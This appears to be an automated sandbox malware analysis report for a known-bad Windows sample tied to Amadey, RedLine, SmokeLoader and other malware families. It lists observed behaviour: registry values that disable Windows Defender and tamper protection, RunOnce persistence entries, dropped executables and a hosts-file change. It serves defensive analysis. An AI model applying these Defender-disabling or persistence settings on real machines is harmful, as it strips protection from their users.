Malware Analysis Report

2025-01-23 09:52

Sample ID 231010-zjlgcaca23
Target file
SHA256 719272605f7bf3b1c7925c5c133c4e0d4427c162f64a9a9f48efae0672a22e2a
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

719272605f7bf3b1c7925c5c133c4e0d4427c162f64a9a9f48efae0672a22e2a

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan

SmokeLoader

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Detects Healer an antivirus disabler dropper

Glupteba

Glupteba payload

Modifies Windows Defender Real-time Protection settings

SectopRAT

RedLine payload

SectopRAT payload

DcRat

Amadey

Healer

Downloads MZ/PE file

Drops file in Drivers directory

Stops running service(s)

Modifies Windows Firewall

Windows security modification

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:44

Reported

2023-10-10 20:47

Platform

win10v2004-20230915-en

Max time kernel

106s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\20A4.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3335.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6DDE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2vm9748.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C9C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oS28ea9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\20A4.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\23B3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3335.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yI890Ix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6DDE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84E2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8744.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ADF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\84E2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\84E2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EX64Yg0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\2AC8.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\16B0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sh6hE7ZX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq4pv4zr.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\lZ4sA27.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc8oZ59.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JI6uC13.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ly3QD9BA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
